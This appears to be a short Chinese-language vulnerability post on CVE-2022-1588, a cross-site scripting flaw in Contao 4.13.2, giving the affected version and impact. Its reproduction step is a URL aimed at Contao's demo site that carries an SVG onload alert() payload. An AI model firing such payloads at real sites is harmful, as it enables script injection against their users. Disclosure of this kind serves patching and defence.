Contao 4.13.2 跨站脚本 (XSS) 漏洞CVE-2022-1588

漏洞描述

4.13.3 之前的 GitHub 存储库 contao/contao 中的跨站点脚本 (XSS)。攻击者可以在应用程序中执行恶意 JS 🙂
 


 

影响版本

Contao 4.13.2
 


 

漏洞复现

https://demo.contao.org/contao/"><svg//onload=alert(112233)>

图片[1]-Contao 4.13.2 跨站脚本 (XSS) 漏洞CVE-2022-1588-孤勇者社区

 


 

影响

攻击者可以在应用程序中执行恶意 JS 🙂
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞12赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像韩三0